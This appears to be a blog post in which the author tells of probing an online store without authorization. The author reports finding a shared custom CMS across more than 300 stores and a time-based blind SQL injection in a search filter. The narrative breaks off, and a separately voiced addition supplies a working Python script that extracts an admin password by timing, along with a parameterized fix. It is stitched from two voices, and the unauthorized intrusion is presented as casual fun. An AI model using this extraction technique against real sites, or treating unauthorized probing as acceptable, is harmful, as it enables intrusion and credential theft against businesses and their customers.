
The story about how I compromised 300 stores, and a “Spanish consultancy”.

submitted by
Style Pass
2021-08-05 15:30:05

I was on an online store, you know, to compare prices about something I wanted to buy. I got bored. I opened the Wappalyzer: Apache 2.4.46, Amazon EC2, PHP. Okay!

It all started as a “let’s see if this site is vulnerable to something or not”. I’m not gonna post names, and I’ll try to avoid any hints. The report about the vulnerabilities and the misconfigurations is still ongoing, so some issues may not be fixed everywhere yet.

It was not a WordPress or another kind of CMS, okay… I checked the robots.txt. I found a panel to log in… I tried default credentials like admin/admin, etc., but they were not working. Reading the footer of the log-in panel, I found two things. The store is part of a chain with more than 300 stores, and the CMS/Platform (I don’t know what to call it) was made by the same company. A little bit of “Googling” to confirm, and I found that ALL OF THEM have the same “CMS”, the same log-in panel, with just a few differences like CSS, languages, etc. What if all of them have common credentials? Looks promising! 😅

I’m always trying the basic things first. I tried some reflected/persistent XSS, SQL Injection on the search bar, etc. There are some params in the URL, so I thought that I could inject code there, but I wasn’t successful in the beginning. At that moment I thought: “Well… maybe the people that built this custom CMS are sanitizing the params, or using, I don’t know, some framework that is doing that for them under the hood”. Not really. Have you ever read about Time-Based Blind SQL Injection attacks before? The search bar has some filters to apply, so I tried some things on them, and BINGO! 😎
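To show what a time-based blind injection through a search filter actually looks like end to end, here is an added example that is not the author's code and not the store's CMS: a toy search handler, written in Python over SQLite, that concatenates a filter value into its SQL the way the post describes, beside a parameterized version that neutralizes the same payload. The schema, the products and the admin password are constructed for the demo. SQLite has no SLEEP(), ASCII() or SUBSTRING(), so a sleep() function is registered as a stand-in for MySQL's SLEEP(), and SQLite's unicode()/substr() play the roles of ASCII()/SUBSTRING(). The extractor goes beyond the single "BINGO" moment in the text: it recovers an arbitrary-length string one character at a time by binary search, using only how long each request takes.

```python
"""Added example: time-based blind SQL injection through a search filter.

Nothing in the page content changes between a true and a false condition;
the only signal is how long the query takes, so the payload asks the database
to sleep when a yes/no question about a secret is answered "yes".
"""
import sqlite3
import time

DELAY = 0.1  # seconds the payload tells the database to sleep (kept short for the demo)


def open_store_db():
    """Constructed sample database: two products and one admin user (not real data)."""
    conn = sqlite3.connect(":memory:")
    # sleep() stands in for MySQL's SLEEP(); it is registered as non-deterministic
    # so SQLite does not fold it into a constant.
    conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 0)
    conn.execute("CREATE TABLE products(id INTEGER, name TEXT, category TEXT)")
    conn.execute("CREATE TABLE users(id INTEGER, login TEXT, pass TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "Laptop", "tech"), (2, "Chair", "home")])
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr')")
    return conn


def search_vulnerable(conn, category):
    """The filter handler as the post describes it: the value is pasted into the SQL."""
    sql = f"SELECT name FROM products WHERE category = '{category}'"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, category):
    """Same query with a bound parameter: the filter can only ever be a value."""
    sql = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in conn.execute(sql, (category,))]


def condition_is_true(conn, cond):
    """Ask one yes/no question; the answer is the response time, not the content.

    MySQL equivalent of the payload: tech' AND IF(<cond>, SLEEP(n), 0) = 0 AND '1'='1
    """
    payload = (f"tech' AND (CASE WHEN ({cond}) THEN sleep({DELAY}) ELSE 0 END) = 0 "
               f"AND '1'='1")
    start = time.perf_counter()
    search_vulnerable(conn, payload)
    return time.perf_counter() - start >= DELAY / 2


def extract_secret(conn, subquery, max_len=16):
    """Recover the string returned by `subquery` one character at a time.

    Each character costs about seven timed requests (binary search over printable
    ASCII); the length check stops the loop once the string runs out.
    """
    secret = ""
    for pos in range(1, max_len + 1):
        if not condition_is_true(conn, f"length(({subquery})) >= {pos}"):
            break  # ran past the end of the string
        lo, hi = 32, 126  # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            # MySQL form: ASCII(SUBSTRING((<subquery>), pos, 1)) > mid
            if condition_is_true(conn, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        secret += chr(lo)
    return secret


if __name__ == "__main__":
    conn = open_store_db()
    admin_pw = extract_secret(conn, "SELECT pass FROM users WHERE login = 'admin'")
    print("recovered via timing:", admin_pw)
    # The same style of payload against the parameterized handler matches nothing.
    print(search_fixed(conn, "tech' AND (CASE WHEN (1=1) THEN sleep(1) ELSE 0 END) = 0 AND '1'='1"))
```

The threshold in condition_is_true is half the requested delay, which is what makes the oracle robust: a query that did not sleep returns in microseconds, one that did takes at least DELAY, and a noisy network only matters if its jitter approaches the sleep itself, in which case a real engagement raises DELAY or repeats each question. The fixed handler needs no input filtering at all; binding the value is the whole fix.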
